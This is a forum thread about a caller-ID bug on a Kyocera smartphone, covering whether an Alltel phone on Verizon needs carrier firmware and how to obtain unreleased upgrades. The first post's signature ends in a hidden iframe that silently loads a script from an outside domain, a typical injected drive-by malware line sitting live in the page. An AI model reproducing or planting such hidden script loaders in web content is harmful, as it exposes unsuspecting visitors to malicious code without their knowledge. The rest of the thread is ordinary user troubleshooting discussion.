+ Reply to Thread

NEED HELP..... firmware and the caller id bug

hello all, i truly need some help,whenever i leave my home area i get the caller id bug.kyocera is telling me the only fix is a firmware upgrade from verizon. i have had numerous retail stores tell me that the wont expect the tools neede to flash the phone until a month or more following the release of the phone.many times they dont get it until a newer version is released(new phones have the new firmware so they dont need to have the tools until a new version is released and thus people would want to upgrade).i really need this upgrade as i leave on june 1 for three months. the place i am going(southeast indiana) is a place wher i am effected by the bug.my caller id only works 30 percent of the time in this location. all other times the phone shows incoming call until after the connection is made or the call is missed at which time the caller id info is properly displayed.can anyone help me find a way to get this done without waitng for verizon to have it in the stores?i have heard some questiion whether upgrading your firmware to the verizon from the alltel/earlier(in my case january)versions. for me its no choice, this feature needs to work so i must get the change. final question, if i have to wait until its actually in the stores(probably mid june or july)then i will not be in my home service area,i will have to go to a store in cincinnati or indianapolis to have it done,do you need to be in your home area when you have the flash/firmware upgrade done ? any light that you all can shed on this very frustrating issue would be greatly appreciated.

Thanx,
    B.Andrew"Andy" Brown
    Executive Director,Camp Livingston,Inc
    www.Camplivingston.com<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i was under the impression that even the newer firmware hasn't yet resolved the caller id bug. can anyone concur?

according to kyocera tech support it has been fixed, they blame the problem on the fact that it is a alltel phone on a verizon network(3 seperate techs told me the same thing).they say i need verizon firmware/software. some on this board claim that it doesnt matter if its verzon or alltel, they say its just new firmware versus old firmware. kyocera specifically disagreed with this,they say the firmware/software is "carrier specifiic".they swear my problem is caused by using alltel on verizon network.i wanted to send my phone to alltel for software /firmware upgrade, they said that it wouldnt help, its still the wrong network. i am very confused and frustrated and i feel that this is exactly the type of risk i took when i adopted early and did the whole get connected thing.well, i got burned and i guess i will wait it out if the new firmware doesnt fix it like they say i will buy a verizon phone and sell this one on ebay. this is the only problem i have with this phone, its been rock solid since january 5th and i am a power user, but this is really maddening, its such a basic phone function and i have the highest tech phone around and it wont show caller id outside my home area!!!! arghhhhhhhh!!!!!

i agree....it is very confusing, but as i understand it, firmware is firmware, whether it's verizon's or alltell's. I buy their explanation (maybe) for having an issue with an alltell phone on a VZW network (sans new firmware), but once the phone is flashed with the new VZW firmware, then the "phone" has no way of knowing the difference between its being a VZW phone or an Alltell phone. Unless there's some hardware difference (which everyone says there's not) then flashing an alltell phone with VZW's software is the same as buying a VZW phone. it's like saying a windows Xp upgrade won't work without bugs if it's replacing windows 98 on the same machine....the new software overrides the old info, thus making it a "new" machine/phone.

fwiw..........i have the bug intermittently....it doesn't matter what area i'm in. i find that 1 to 2 soft resets a day helps.

Folks,

The newer firmware fixes this bug in all cases.

I am on SZ 1.0.24 / MZ 1.0.38 with an Alltel phone on Verizon. I think Verizon officially released 1.0.23 / 1.0.36. It had the fix.

You can also tell because after a HotSync, a message pops up to optimize the contact database.

Glenn

glenn:
    from reading this board, it seems some people who have gotten the upgrade are seeing an increased amount of RSOD...what's your experience with this? is the newer firmware more stable? most people on the board don't seem to think so.....some were having no problems (other than the caller ID bug) and after they got the upgrade, they're having more problems. any thoughts?
    thanks!!

any ideas on how to get the upgrade b/4 it is in verizon stores,or when it will be in verizon stores or if it matters if i do the upgrade andi am not in my home area. last question,how does the quick contact match thing help if the person calling is not in your address book,does this fix only work if they are in your contacts or does it show all numbers incoming as it should once you have new firmware

the firmware updates (pre-verizone release) for the 6035 were found on some rouge clandestine sites way back when this board involved a few hundred members...but as the board started getting bigger, kyocera put the clamp on the people who were hosting the upgrades, and information on how to upgrade. several "cease and desist" warnings were sent to those people, and i haven't seen anything for the 6035 or the 7135 since. i know a few ppl here have been able to upgrade (anyone with the new KWPST and/or the newest KW and SZ files that fix this damn caller id bug problem that would like to PM me, would be greatly appreciated)

Other than that, i think our best bet is to just wait for VZW to get an update, and have the phone flashed by them.

Good luck!